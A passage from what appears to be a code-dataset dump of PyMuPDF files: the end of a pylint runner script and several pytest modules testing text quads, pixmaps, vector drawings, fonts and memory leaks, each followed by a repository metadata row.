W0612: Unused variable 'keyvals' (unused-variable)
W0613: Unused argument 'kwargs' (unused-argument)
W0621: Redefining name 'show' from outer scope (line 159) (redefined-outer-name)
W0640: Cell variable o defined in loop (cell-var-from-loop)
W0718: Catching too general exception Exception (broad-exception-caught)
W0719: Raising too general exception: Exception (broad-exception-raised)
C3001: Lambda expression assigned to a variable. Define a function using the "def" keyword instead. (unnecessary-lambda-assignment)
R0801: Similar lines in 2 files
R0917: Too many positional arguments (7/5) (too-many-positional-arguments)
'''
)
ignores_list = list()
for line in ignores.split('\n'):
if not line or line.startswith('#'):
continue
m = re.match('^(.....): ', line)
assert m, f'Failed to parse {line=}'
ignores_list.append(m.group(1))
ignores = ','.join(ignores_list)
root = os.path.abspath(f'{__file__}/../..')
sys.path.insert(0, root)
import pipcl
del sys.path[0]
# We want to run pylist on all of our src/*.py files so we find them with
# `pipcl.git_items()`. However this seems to fail on github windows with
# `fatal: not a git repository (or any of the parent directories): .git` so
# we also hard-code the list and verify it matches `git ls-files` on other
# platforms. This ensures that we will always pick up new .py files in the
# future.
#
command = f'pylint -d {ignores}'
directory = f'{root}/src'
directory = directory.replace('/', os.sep)
leafs = [
'__init__.py',
'__main__.py',
'_apply_pages.py',
'fitz___init__.py',
'fitz_table.py',
'fitz_utils.py',
'pymupdf.py',
'table.py',
'utils.py',
]
leafs.sort()
try:
leafs_git = pipcl.git_items(directory)
except Exception as e:
import platform
assert platform.system() == 'Windows'
else:
leafs_git = [i for i in leafs_git if i.endswith('.py')]
leafs_git.sort()
assert leafs_git == leafs, f'leafs:\n {leafs!r}\nleafs_git:\n {leafs_git!r}'
for leaf in leafs:
command += f' {directory}/{leaf}'
print(f'Running: {command}')
subprocess.run(command, shell=1, check=1)
| 7,884 | Python | .py | 129 | 50.713178 | 166 | 0.653098 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,331 | test_linequad.py | pymupdf_PyMuPDF/tests/test_linequad.py | """
Check approx. equality of search quads versus quads recovered from
text extractions.
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "quad-calc-0.pdf")
def test_quadcalc():
text = " angle 327" # search for this text
doc = pymupdf.open(filename)
page = doc[0]
# This special page has one block with one line, and
# its last span contains the searched text.
block = page.get_text("dict", flags=0)["blocks"][0]
line = block["lines"][0]
# compute quad of last span in line
lineq = pymupdf.recover_line_quad(line, spans=line["spans"][-1:])
# let text search find the text returning quad coordinates
rl = page.search_for(text, quads=True)
searchq = rl[0]
assert abs(searchq.ul - lineq.ul) <= 1e-4
assert abs(searchq.ur - lineq.ur) <= 1e-4
assert abs(searchq.ll - lineq.ll) <= 1e-4
assert abs(searchq.lr - lineq.lr) <= 1e-4
| 975 | Python | .py | 25 | 35.24 | 69 | 0.683598 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,332 | test_import.py | pymupdf_PyMuPDF/tests/test_import.py | import os
import subprocess
import sys
import textwrap
def test_import():
root = os.path.abspath(f'{__file__}/../../')
p = f'{root}/tests/resources_test_import.py'
with open(p, 'w') as f:
f.write(textwrap.dedent(
'''
from pymupdf.utils import *
from pymupdf.table import *
from pymupdf import *
'''
))
subprocess.run(f'{sys.executable} {p}', shell=1, check=1)
| 482 | Python | .py | 16 | 21.5 | 61 | 0.534483 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,333 | test_2791.py | pymupdf_PyMuPDF/tests/test_2791.py | import pymupdf
import gc
import os
import platform
import sys
def merge_pdf(content: bytes, coverpage: bytes):
with pymupdf.Document(stream=coverpage, filetype='pdf') as coverpage_pdf:
with pymupdf.Document(stream=content, filetype='pdf') as content_pdf:
coverpage_pdf.insert_pdf(content_pdf)
doc = coverpage_pdf.write()
return doc
def test_2791():
'''
Check for memory leaks.
'''
if os.environ.get('PYMUPDF_RUNNING_ON_VALGRIND') == '1':
print(f'test_2791(): not running because PYMUPDF_RUNNING_ON_VALGRIND=1.')
return
if platform.system().startswith('MSYS_NT-'):
print(f'test_2791(): not running on msys2 - psutil not available.')
return
#stat_type = 'tracemalloc'
stat_type = 'psutil'
if stat_type == 'tracemalloc':
import tracemalloc
tracemalloc.start(10)
def get_stat():
current, peak = tracemalloc.get_traced_memory()
return current
elif stat_type == 'psutil':
# We use RSS, as used by mprof.
import psutil
process = psutil.Process()
def get_stat():
return process.memory_info().rss
else:
def get_stat():
return 0
n = 1000
stats = [1] * n
for i in range(n):
root = os.path.abspath(f'{__file__}/../../tests/resources')
with open(f'{root}/test_2791_content.pdf', 'rb') as content_pdf:
with open(f'{root}/test_2791_coverpage.pdf', 'rb') as coverpage_pdf:
content = content_pdf.read()
coverpage = coverpage_pdf.read()
merge_pdf(content, coverpage)
sys.stdout.flush()
gc.collect()
stats[i] = get_stat()
print(f'Memory usage {stat_type=}.')
for i, stat in enumerate(stats):
sys.stdout.write(f' {stat}')
#print(f' {i}: {stat}')
sys.stdout.write('\n')
first = stats[2]
last = stats[-1]
ratio = last / first
print(f'{first=} {last=} {ratio=}')
if platform.system() != 'Linux':
# Values from psutil indicate larger memory leaks on non-Linux. Don't
# yet know whether this is because rss is measured differently or a
# genuine leak is being exposed.
print(f'test_2791(): not asserting ratio because not running on Linux.')
elif not hasattr(pymupdf, 'mupdf'):
# Classic implementation has unfixed leaks.
print(f'test_2791(): not asserting ratio because using classic implementation.')
elif [int(x) for x in platform.python_version_tuple()[:2]] < [3, 11]:
print(f'test_2791(): not asserting ratio because python version less than 3.11: {platform.python_version()=}.')
elif stat_type == 'tracemalloc':
# With tracemalloc Before fix to src/extra.i's calls to
# PyObject_CallMethodObjArgs, ratio was 4.26; after it was 1.40.
assert ratio > 1 and ratio < 1.6
elif stat_type == 'psutil':
# Prior to fix, ratio was 1.043. After the fix, improved to 1.005, but
# varies and sometimes as high as 1.010.
# 2024-06-03: have seen 0.99919 on musl linux, and sebras reports .025.
assert ratio >= 0.990 and ratio < 1.027, f'{ratio=}'
else:
pass
| 3,282 | Python | .py | 80 | 33.075 | 119 | 0.614371 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,334 | test_pixmap.py | pymupdf_PyMuPDF/tests/test_pixmap.py | """
Pixmap tests
* make pixmap of a page and assert bbox size
* make pixmap from a PDF xref and compare with extracted image
* pixmap from file and from binary image and compare
"""
import pymupdf
import os
import platform
import sys
import tempfile
import pytest
import textwrap
scriptdir = os.path.abspath(os.path.dirname(__file__))
epub = os.path.join(scriptdir, "resources", "Bezier.epub")
pdf = os.path.join(scriptdir, "resources", "001003ED.pdf")
imgfile = os.path.join(scriptdir, "resources", "nur-ruhig.jpg")
def test_pagepixmap():
# pixmap from an EPUB page
doc = pymupdf.open(epub)
page = doc[0]
pix = page.get_pixmap()
assert pix.irect == page.rect.irect
pix = page.get_pixmap(alpha=True)
assert pix.alpha
assert pix.n == pix.colorspace.n + pix.alpha
def test_pdfpixmap():
# pixmap from xref in a PDF
doc = pymupdf.open(pdf)
# take first image item of first page
img = doc.get_page_images(0)[0]
# make pixmap of it
pix = pymupdf.Pixmap(doc, img[0])
# assert pixmap properties
assert pix.width == img[2]
assert pix.height == img[3]
# extract image and compare metadata
extractimg = doc.extract_image(img[0])
assert extractimg["width"] == pix.width
assert extractimg["height"] == pix.height
def test_filepixmap():
# pixmaps from file and from stream
# should lead to same result
pix1 = pymupdf.Pixmap(imgfile)
stream = open(imgfile, "rb").read()
pix2 = pymupdf.Pixmap(stream)
assert repr(pix1) == repr(pix2)
assert pix1.digest == pix2.digest
def test_pilsave():
# pixmaps from file then save to pillow image
# make pixmap from this and confirm equality
try:
pix1 = pymupdf.Pixmap(imgfile)
stream = pix1.pil_tobytes("JPEG")
pix2 = pymupdf.Pixmap(stream)
assert repr(pix1) == repr(pix2)
except ModuleNotFoundError:
assert platform.system() == 'Windows' and sys.maxsize == 2**31 - 1
def test_save(tmpdir):
# pixmaps from file then save to image
# make pixmap from this and confirm equality
pix1 = pymupdf.Pixmap(imgfile)
outfile = os.path.join(tmpdir, "foo.png")
pix1.save(outfile, output="png")
# read it back
pix2 = pymupdf.Pixmap(outfile)
assert repr(pix1) == repr(pix2)
def test_setalpha():
# pixmap from JPEG file, then add an alpha channel
# with 30% transparency
pix1 = pymupdf.Pixmap(imgfile)
opa = int(255 * 0.3) # corresponding to 30% transparency
alphas = [opa] * (pix1.width * pix1.height)
alphas = bytearray(alphas)
pix2 = pymupdf.Pixmap(pix1, 1) # add alpha channel
pix2.set_alpha(alphas) # make image 30% transparent
samples = pix2.samples # copy of samples
# confirm correct the alpha bytes
t = bytearray([samples[i] for i in range(3, len(samples), 4)])
assert t == alphas
def test_color_count():
'''
This is known to fail if MuPDF is built without PyMuPDF's custom config.h,
e.g. in Linux system installs.
'''
pm = pymupdf.Pixmap(imgfile)
assert pm.color_count() == 40624
def test_memoryview():
pm = pymupdf.Pixmap(imgfile)
samples = pm.samples_mv
assert isinstance( samples, memoryview)
print( f'samples={samples} samples.itemsize={samples.itemsize} samples.nbytes={samples.nbytes} samples.ndim={samples.ndim} samples.shape={samples.shape} samples.strides={samples.strides}')
assert samples.itemsize == 1
assert samples.nbytes == 659817
assert samples.ndim == 1
assert samples.shape == (659817,)
assert samples.strides == (1,)
color = pm.pixel( 100, 100)
print( f'color={color}')
assert color == (83, 66, 40)
def test_samples_ptr():
pm = pymupdf.Pixmap(imgfile)
samples = pm.samples_ptr
print( f'samples={samples}')
assert isinstance( samples, int)
def test_2369():
width, height = 13, 37
image = pymupdf.Pixmap(pymupdf.csGRAY, width, height, b"\x00" * (width * height), False)
with pymupdf.Document(stream=image.tobytes(output="pam"), filetype="pam") as doc:
test_pdf_bytes = doc.convert_to_pdf()
with pymupdf.Document(stream=test_pdf_bytes) as doc:
page = doc[0]
img_xref = page.get_images()[0][0]
img = doc.extract_image(img_xref)
img_bytes = img["image"]
pymupdf.Pixmap(img_bytes)
def test_page_idx_int():
doc = pymupdf.open(pdf)
with pytest.raises(AssertionError):
doc["0"]
assert doc[0]
assert doc[(0,0)]
def test_fz_write_pixmap_as_jpeg():
width, height = 13, 37
image = pymupdf.Pixmap(pymupdf.csGRAY, width, height, b"\x00" * (width * height), False)
with pymupdf.Document(stream=image.tobytes(output="jpeg"), filetype="jpeg") as doc:
test_pdf_bytes = doc.convert_to_pdf()
def test_3020():
pm = pymupdf.Pixmap(imgfile)
pm2 = pymupdf.Pixmap(pm, 20, 30, None)
pm3 = pymupdf.Pixmap(pymupdf.csGRAY, pm)
pm4 = pymupdf.Pixmap(pm, pm3)
def test_3050():
'''
This is known to fail if MuPDF is built without it's default third-party
libraries, e.g. in Linux system installs.
'''
pdf_file = pymupdf.open(pdf)
for page_no, page in enumerate(pdf_file):
zoom_x = 4.0
zoom_y = 4.0
matrix = pymupdf.Matrix(zoom_x, zoom_y)
pix = page.get_pixmap(matrix=matrix)
digest0 = pix.digest
print(f'{pix.width=} {pix.height=}')
def product(x, y):
for yy in y:
for xx in x:
yield (xx, yy)
n = 0
# We use a small subset of the image because non-optimised rebase gets
# very slow.
for pos in product(range(100), range(100)):
if sum(pix.pixel(pos[0], pos[1])) >= 600:
n += 1
pix.set_pixel(pos[0], pos[1], (255, 255, 255))
digest1 = pix.digest
print(f'{page_no=} {n=} {digest0=} {digest1=}')
digest_expected = b'\xd7x\x94_\x98\xa1<-/\xf3\xf9\x04\xec#\xaa\xee'
pix.save(os.path.abspath(f'{__file__}/../../tests/test_3050_out.png'))
assert digest1 != digest0
assert digest1 == digest_expected
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'PDF stream Length incorrect'
def test_3058():
doc = pymupdf.Document(os.path.abspath(f'{__file__}/../../tests/resources/test_3058.pdf'))
images = doc[0].get_images(full=True)
pix = pymupdf.Pixmap(doc, 17)
# First bug was that `pix.colorspace` was DeviceRGB.
assert str(pix.colorspace) == 'Colorspace(CS_CMYK) - DeviceCMYK'
pix = pymupdf.Pixmap(pymupdf.csRGB, pix)
assert str(pix.colorspace) == 'Colorspace(CS_RGB) - DeviceRGB'
# Second bug was that the image was converted to RGB via greyscale proofing
# color space, so image contained only shades of grey. This compressed
# easily to a .png file, so we crudely check the bug is fixed by looking at
# size of .png file.
path = os.path.abspath(f'{__file__}/../../tests/test_3058_out.png')
pix.save(path)
s = os.path.getsize(path)
assert 1800000 < s < 2600000, f'Unexpected size of {path}: {s}'
def test_3072():
if pymupdf.mupdf_version_tuple < (1, 23, 10):
print(f'test_3072(): Not running because known to hang on MuPDF < 1.23.10.')
return
path = os.path.abspath(f'{__file__}/../../tests/resources/test_3072.pdf')
out = os.path.abspath(f'{__file__}/../../tests')
doc = pymupdf.open(path)
page_48 = doc[0]
bbox = [147, 300, 447, 699]
rect = pymupdf.Rect(*bbox)
zoom = pymupdf.Matrix(3, 3)
pix = page_48.get_pixmap(clip=rect, matrix=zoom)
image_save_path = f'{out}/1.jpg'
pix.save(image_save_path, jpg_quality=95)
doc = pymupdf.open(path)
page_49 = doc[1]
bbox = [147, 543, 447, 768]
rect = pymupdf.Rect(*bbox)
zoom = pymupdf.Matrix(3, 3)
pix = page_49.get_pixmap(clip=rect, matrix=zoom)
image_save_path = f'{out}/2.jpg'
pix.save(image_save_path, jpg_quality=95)
rebase = hasattr(pymupdf, 'mupdf')
if rebase:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == (
"syntax error: cannot find ExtGState resource 'BlendMode0'\n"
"encountered syntax errors; page may not be correct\n"
"syntax error: cannot find ExtGState resource 'BlendMode0'\n"
"encountered syntax errors; page may not be correct"
)
def test_3134():
doc = pymupdf.Document()
page = doc.new_page()
page.get_pixmap(clip=pymupdf.Rect(0, 0, 100, 100)).save("test_3134_rect.jpg")
page.get_pixmap(clip=pymupdf.IRect(0, 0, 100, 100)).save("test_3134_irect.jpg")
stat_rect = os.stat('test_3134_rect.jpg')
stat_irect = os.stat('test_3134_irect.jpg')
print(f' {stat_rect=}')
print(f'{stat_irect=}')
assert stat_rect.st_size == stat_irect.st_size
def test_3177():
path = os.path.abspath(f'{__file__}/../../tests/resources/img-transparent.png')
pixmap = pymupdf.Pixmap(path)
pixmap2 = pymupdf.Pixmap(None, pixmap)
def test_3493():
'''
If python3-gi is installed, we check fix for #3493, where importing gi
would load an older version of libjpeg than is used in MuPDF, and break
MuPDF.
This test is excluded by default in sysinstall tests, because running
commands in a new venv does not seem to pick up pymupdf as expected.
'''
if platform.system() != 'Linux':
print(f'Not running because not Linux: {platform.system()=}')
return
import subprocess
root = os.path.abspath(f'{__file__}/../..')
in_path = f'{root}/tests/resources/test_3493.epub'
def run(command, check=1, stdout=None):
print(f'Running with {check=}: {command}')
return subprocess.run(command, shell=1, check=check, stdout=stdout, text=1)
def run_code(code, code_path, *, check=True, venv=None, venv_args='', pythonpath=None, stdout=None):
code = textwrap.dedent(code)
with open(code_path, 'w') as f:
f.write(code)
prefix = f'PYTHONPATH={pythonpath} ' if pythonpath else ''
if venv:
# Have seen this fail on Github in a curious way:
#
# Running: /tmp/tmp.fBeKNLJQKk/venv/bin/python -m venv --system-site-packages /project/tests/resources/test_3493_venv
# Error: [Errno 2] No such file or directory: '/project/tests/resources/test_3493_venv/bin/python'
#
r = run(f'{sys.executable} -m venv {venv_args} {venv}', check=check)
if r.returncode:
return r
r = run(f'. {venv}/bin/activate && {prefix}python {code_path}', check=check, stdout=stdout)
else:
r = run(f'{prefix}{sys.executable} {code_path}', check=check, stdout=stdout)
return r
# Find location of system install of `gi`.
r = run_code(
'''
from gi.repository import GdkPixbuf
import gi
print(gi.__file__)
'''
,
f'{root}/tests/resources/test_3493_gi.py',
check=0,
venv=f'{root}/tests/resources/test_3493_venv',
venv_args='--system-site-packages',
stdout=subprocess.PIPE,
)
if r.returncode:
print(f'test_3493(): Not running test because --system-site-packages venv cannot import gi.')
return
gi = r.stdout.strip()
gi_pythonpath = os.path.abspath(f'{gi}/../..')
def do(gi):
# Run code that will import gi and pymupdf in different orders, and
# return contents of generated .png file as a bytes.
out = f'{root}/tests/resources/test_3493_{gi}.png'
run_code(
f'''
if {gi}==0:
import pymupdf
elif {gi}==1:
from gi.repository import GdkPixbuf
import pymupdf
elif {gi}==2:
import pymupdf
from gi.repository import GdkPixbuf
else:
assert 0
document = pymupdf.Document('{in_path}')
page = document[0]
print(f'{gi=}: saving to: {out}')
page.get_pixmap().save('{out}')
'''
,
os.path.abspath(f'{root}/tests/resources/test_3493_{gi}.py'),
pythonpath=gi_pythonpath,
)
with open(out, 'rb') as f:
return f.read()
out0 = do(0)
out1 = do(1)
out2 = do(2)
print(f'{len(out0)=} {len(out1)=} {len(out2)=}.')
if pymupdf.mupdf_version_tuple >= (1, 24, 3):
assert out1 == out0
else:
assert out1 != out0
assert out2 == out0
def test_3848():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3848.pdf')
with pymupdf.open(path) as document:
for i in range(len(document)):
page = document.load_page(i)
print(f'{page=}.')
for annot in page.get_drawings():
if page.get_textbox(annot['rect']):
rect = annot['rect']
pixmap = page.get_pixmap(clip=rect)
color_bytes = pixmap.color_topusage()
| 13,375 | Python | .py | 328 | 33.088415 | 192 | 0.617217 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,335 | test_2907.py | pymupdf_PyMuPDF/tests/test_2907.py | import pymupdf
import os.path
import pathlib
def test_2907():
# This test is for a bug in classic 'segfault trying to call clean_contents
# on certain pdfs with python 3.12', which we are not going to fix.
if not hasattr(pymupdf, 'mupdf'):
print('test_2907(): not running on classic because known to fail.')
return
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2907.pdf')
pdf_file = pathlib.Path(path).read_bytes()
fitz_document = pymupdf.open(stream=pdf_file, filetype="application/pdf")
pdf_pages = list(fitz_document.pages())
(page,) = pdf_pages
page.clean_contents()
if pymupdf.mupdf_version_tuple < (1, 24, 2):
# We expect 'dropping unclosed PDF processor' warnings.
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt
| 818 | Python | .py | 19 | 37.684211 | 79 | 0.678392 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,336 | test_2904.py | pymupdf_PyMuPDF/tests/test_2904.py | import pymupdf
import os
import sys
def test_2904():
print(f'test_2904(): {pymupdf.mupdf_version_tuple=}.')
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2904.pdf')
pdf_docs = pymupdf.open(path)
for page_id, page in enumerate(pdf_docs):
page_imgs = page.get_images()
for i, img in enumerate(page_imgs):
if page_id == 5:
#print(f'{page_id=} {i=} {type(img)=} {img=}')
sys.stdout.flush()
e = None
try:
recs = page.get_image_rects(img, transform=True)
except Exception as ee:
print(f'Exception: {page_id=} {i=} {img=}: {ee}')
if 0 and hasattr(pymupdf, 'mupdf'):
print(f'pymupdf.exception_info:')
pymupdf.exception_info()
sys.stdout.flush()
e = ee
if page_id == 5:
print(f'{pymupdf.mupdf_version_tuple=}: {page_id=} {i=} {e=} {img=}:')
if page_id == 5 and i==3:
assert e
if hasattr(pymupdf, 'mupdf'):
# rebased.
if pymupdf.mupdf_version_tuple >= (1, 24):
assert str(e) == 'code=8: Failed to read JPX header'
else:
assert str(e) == 'code=4: Failed to read JPX header'
else:
# classic
assert str(e) == 'Failed to read JPX header'
else:
assert not e
# Clear warnings, as we will have generated many.
pymupdf.TOOLS.mupdf_warnings()
| 1,661 | Python | .py | 40 | 27.525 | 86 | 0.479554 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,337 | test_linebreaks.py | pymupdf_PyMuPDF/tests/test_linebreaks.py | import pymupdf
import os.path
def test_linebreaks():
"""Test avoidance of linebreaks."""
path = os.path.abspath(f"{__file__}/../../tests/resources/test-linebreaks.pdf")
doc = pymupdf.open(path)
page = doc[0]
tp = page.get_textpage(flags=pymupdf.TEXTFLAGS_WORDS)
word_count = len(page.get_text("words", textpage=tp))
line_count1 = len(page.get_text(textpage=tp).splitlines())
line_count2 = len(page.get_text(sort=True, textpage=tp).splitlines())
assert word_count == line_count1
assert line_count2 < line_count1 / 2
| 558 | Python | .py | 13 | 38.615385 | 83 | 0.691882 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,338 | test_drawings.py | pymupdf_PyMuPDF/tests/test_drawings.py | """
Extract drawings of a PDF page and compare with stored expected result.
"""
import io
import os
import sys
import pprint
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
symbols = os.path.join(scriptdir, "resources", "symbols.txt")
def test_drawings1():
symbols_text = open(symbols).read() # expected result
doc = pymupdf.open(filename)
page = doc[0]
paths = page.get_cdrawings()
out = io.StringIO() # pprint output goes here
pprint.pprint(paths, stream=out)
assert symbols_text == out.getvalue()
def test_drawings2():
delta = (0, 20, 0, 20)
doc = pymupdf.open()
page = doc.new_page()
r = pymupdf.Rect(100, 100, 200, 200)
page.draw_circle(r.br, 2, color=0)
r += delta
page.draw_line(r.tl, r.br, color=0)
r += delta
page.draw_oval(r, color=0)
r += delta
page.draw_rect(r, color=0)
r += delta
page.draw_quad(r.quad, color=0)
r += delta
page.draw_polyline((r.tl, r.tr, r.br), color=0)
r += delta
page.draw_bezier(r.tl, r.tr, r.br, r.bl, color=0)
r += delta
page.draw_curve(r.tl, r.tr, r.br, color=0)
r += delta
page.draw_squiggle(r.tl, r.br, color=0)
r += delta
rects = [p["rect"] for p in page.get_cdrawings()]
bboxes = [b[1] for b in page.get_bboxlog()]
for i, r in enumerate(rects):
assert pymupdf.Rect(r) in pymupdf.Rect(bboxes[i])
def _dict_difference(a, b):
"""
Verifies that dictionaries "a", "b"
* have the same keys and values, except for key "items":
* the items list of "a" must be one shorter but otherwise equal the "b" items
Returns last item of b["items"].
"""
assert a.keys() == b.keys()
for k in a.keys():
v1 = a[k]
v2 = b[k]
if k != "items":
assert v1 == v2
else:
assert v1 == v2[:-1]
rc = v2[-1]
return rc
def test_drawings3():
doc = pymupdf.open()
page1 = doc.new_page()
shape1 = page1.new_shape()
shape1.draw_line((10, 10), (10, 50))
shape1.draw_line((10, 50), (100, 100))
shape1.finish(closePath=False)
shape1.commit()
drawings1 = page1.get_drawings()[0]
page2 = doc.new_page()
shape2 = page2.new_shape()
shape2.draw_line((10, 10), (10, 50))
shape2.draw_line((10, 50), (100, 100))
shape2.finish(closePath=True)
shape2.commit()
drawings2 = page2.get_drawings()[0]
assert _dict_difference(drawings1, drawings2) == ("l", (100, 100), (10, 10))
page3 = doc.new_page()
shape3 = page3.new_shape()
shape3.draw_line((10, 10), (10, 50))
shape3.draw_line((10, 50), (100, 100))
shape3.draw_line((100, 100), (50, 70))
shape3.finish(closePath=False)
shape3.commit()
drawings3 = page3.get_drawings()[0]
page4 = doc.new_page()
shape4 = page4.new_shape()
shape4.draw_line((10, 10), (10, 50))
shape4.draw_line((10, 50), (100, 100))
shape4.draw_line((100, 100), (50, 70))
shape4.finish(closePath=True)
shape4.commit()
drawings4 = page4.get_drawings()[0]
assert _dict_difference(drawings3, drawings4) == ("l", (50, 70), (10, 10))
def test_2365():
"""Draw a filled rectangle on a new page.
Then extract the page's vector graphics and confirm that only one path
was generated which has all the right properties."""
doc = pymupdf.open()
page = doc.new_page()
rect = pymupdf.Rect(100, 100, 200, 200)
page.draw_rect(
rect, color=pymupdf.pdfcolor["black"], fill=pymupdf.pdfcolor["yellow"], width=3
)
paths = page.get_drawings()
assert len(paths) == 1
path = paths[0]
assert path["type"] == "fs"
assert path["fill"] == pymupdf.pdfcolor["yellow"]
assert path["fill_opacity"] == 1
assert path["color"] == pymupdf.pdfcolor["black"]
assert path["stroke_opacity"] == 1
assert path["width"] == 3
assert path["rect"] == rect
def test_2462():
"""
Assertion happens, if this code does NOT bring down the interpreter.
Background:
We previously ignored clips for non-vector-graphics. However, ending
a clip does not refer back the object(s) that have been clipped.
In order to correctly compute the "scissor" rectangle, we now keep track
of the clipped object type.
"""
doc = pymupdf.open(f"{scriptdir}/resources/test-2462.pdf")
page = doc[0]
vg = page.get_drawings(extended=True)
def test_2556():
"""Ensure that incomplete clip paths will be properly ignored."""
doc = pymupdf.open() # new empty PDF
page = doc.new_page() # new page
# following contains an incomplete clip
c = b"q 50 697.6 400 100.0 re W n q 0 0 m W n Q "
xref = doc.get_new_xref() # prepare /Contents object for page
doc.update_object(xref, "<<>>") # new xref now is a dictionary
doc.update_stream(xref, c) # store drawing commands
page.set_contents(xref) # give the page this xref as /Contents
# following will bring down interpreter if fix not installed
assert page.get_drawings(extended=True)
def test_3207():
"""Example graphics with multiple "close path" commands within same path.
The fix translates a close-path commands into an additional line
which connects the current point with a preceding "move" target.
The example page has 2 paths which each contain 2 close-path
commands after 2 normal "line" commands, i.e. 2 command sequences
"move-to, line-to, line-to, close-path".
This is converted into 3 connected lines, where the last end point
is connect to the start point of the first line.
So, in the sequence of lines / points
(p0, p1), (p2, p3), (p4, p5), (p6, p7), (p8, p9), (p10, p11)
point p5 must equal p0, and p11 must equal p6 (for each of the
two paths in the example).
"""
filename = os.path.join(scriptdir, "resources", "test-3207.pdf")
doc = pymupdf.open(filename)
page = doc[0]
paths = page.get_drawings()
assert len(paths) == 2
path0 = paths[0]
items = path0["items"]
assert len(items) == 6
p0 = items[0][1]
p5 = items[2][2]
p6 = items[3][1]
p11 = items[5][2]
assert p0 == p5
assert p6 == p11
path1 = paths[1]
items = path1["items"]
assert len(items) == 6
p0 = items[0][1]
p5 = items[2][2]
p6 = items[3][1]
p11 = items[5][2]
assert p0 == p5
assert p6 == p11
def test_3591():
"""Confirm correct scaling factor for rotation matrices."""
filename = os.path.join(scriptdir, "resources", "test-3591.pdf")
doc = pymupdf.open(filename)
page = doc[0]
paths = page.get_drawings()
for p in paths:
assert p["width"] == 15
| 6,746 | Python | .py | 186 | 31.182796 | 87 | 0.638889 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,339 | test_font.py | pymupdf_PyMuPDF/tests/test_font.py | """
Tests for the Font class.
"""
import pymupdf
import os
def test_font1():
text = "PyMuPDF"
font = pymupdf.Font("helv")
assert font.name == "Helvetica"
tl = font.text_length(text, fontsize=20)
cl = font.char_lengths(text, fontsize=20)
assert len(text) == len(cl)
assert abs(sum(cl) - tl) < pymupdf.EPSILON
for i in range(len(cl)):
assert cl[i] == font.glyph_advance(ord(text[i])) * 20
font2 = pymupdf.Font(fontbuffer=font.buffer)
codepoints1 = font.valid_codepoints()
codepoints2 = font2.valid_codepoints()
print('')
print(f'{len(codepoints1)=}')
print(f'{len(codepoints2)=}')
if 0:
for i, (ucs1, ucs2) in enumerate(zip(codepoints1, codepoints2)):
print(f' {i}: {ucs1=} {ucs2=} {"" if ucs2==ucs2 else "*"}')
assert font2.valid_codepoints() == font.valid_codepoints()
# Also check we can get font's bbox.
bbox1 = font.bbox
print(f'{bbox1=}')
if hasattr(pymupdf, 'mupdf'):
bbox2 = font.this.fz_font_bbox()
assert bbox2 == bbox1
def test_font2():
"""Old and new length computation must be the same."""
font = pymupdf.Font("helv")
text = "PyMuPDF"
assert font.text_length(text) == pymupdf.get_text_length(text)
def test_fontname():
"""Assert a valid PDF fontname."""
doc = pymupdf.open()
page = doc.new_page()
assert page.insert_font() # assert: a valid fontname works!
detected = False # preset indicator
try: # fontname check will fail first - don't need a font at all here
page.insert_font(fontname="illegal/char", fontfile="unimportant")
except ValueError as e:
if str(e).startswith("bad fontname chars"):
detected = True # illegal fontname detected
assert detected
def test_2608():
if pymupdf.mupdf_version_tuple <= (1, 23, 4):
print( f'Not running test_2608 because mupdf too old: {pymupdf.mupdf_version_tuple=}')
return
flags = (pymupdf.TEXT_DEHYPHENATE | pymupdf.TEXT_MEDIABOX_CLIP)
with pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/2201.00069.pdf')) as doc:
page = doc[0]
blocks = page.get_text_blocks(flags=flags)
text = blocks[10][4]
with open(os.path.abspath(f'{__file__}/../../tests/test_2608_out'), 'wb') as f:
f.write(text.encode('utf8'))
path_expected = os.path.normpath(f'{__file__}/../../tests/resources/test_2608_expected')
with open(path_expected, 'rb') as f:
expected = f.read().decode('utf8')
# Github windows x32 seems to insert \r characters; maybe something to
# do with the Python installation's line endings settings.
expected = expected.replace('\r', '')
print(f'test_2608(): {text.encode("utf8")=}')
print(f'test_2608(): {expected.encode("utf8")=}')
assert text == expected
def test_fontarchive():
import subprocess
arch = pymupdf.Archive()
css = pymupdf.css_for_pymupdf_font("notos", archive=arch, name="sans-serif")
print(css)
print(arch.entry_list)
assert arch.entry_list == \
[
{
'fmt': 'tree',
'entries':
[
'notosbo', 'notosbi', 'notosit', 'notos'
],
'path': None
}
]
def test_load_system_font():
if not hasattr(pymupdf, 'mupdf'):
print(f'test_load_system_font(): Not running on classic.')
return
if pymupdf.mupdf_version_tuple < (1, 24):
print(f'test_load_system_font(): Not running because mupdf version < 1.24.')
return
trace = list()
def font_f(name, bold, italic, needs_exact_metrics):
trace.append((name, bold, italic, needs_exact_metrics))
